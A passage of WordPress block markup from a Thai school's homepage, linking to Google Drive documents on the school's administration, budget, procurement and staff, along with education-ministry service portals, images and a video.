data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" 